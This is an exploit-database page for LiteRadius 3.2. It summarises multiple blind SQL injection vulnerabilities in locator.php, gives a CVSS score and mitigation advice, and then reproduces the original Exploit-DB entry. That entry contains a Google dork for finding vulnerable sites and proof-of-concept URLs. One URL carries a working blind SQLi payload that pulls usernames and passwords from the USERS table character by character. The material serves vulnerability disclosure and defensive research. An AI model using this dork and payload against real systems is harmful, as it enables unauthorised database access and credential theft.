LiteRadius - exploit.company

vendor:

LiteRadius

by:

Robert Cooper

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: LiteRadius

Affected Version From: 3.2

Affected Version To: 3.2

Patch Exists: NO

Related CWE: N/A

CPE: a:escaperadius:literadius:3.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows 7

2011

LiteRadius <= 3.2 - Multiple Blind SQL Injection vulnerabilities

LiteRadius is vulnerable to multiple Blind SQL Injection vulnerabilities. Attackers can exploit these vulnerabilities by sending maliciously crafted requests to the vulnerable application. This can allow attackers to gain access to sensitive information stored in the database, such as usernames and passwords. The PoC provided shows how an attacker can exploit this vulnerability by sending a maliciously crafted request to the vulnerable application.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: LiteRadius <= 3.2 - Multiple Blind SQL Injection vulnerabilities
# Google Dork: allinurl: locator.php?long=
# Date: 7/12/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: http://www.escaperadius.com/er/products/literadius/lr.php
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: lat=, long=

##############################################################
PoC:

http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334'
http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334 and ascii(substring((SELECT concat(username,0x3a,password,0x3a,0x0a) FROM USERS limit 0,1),1,1))>80


##############################################################
www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew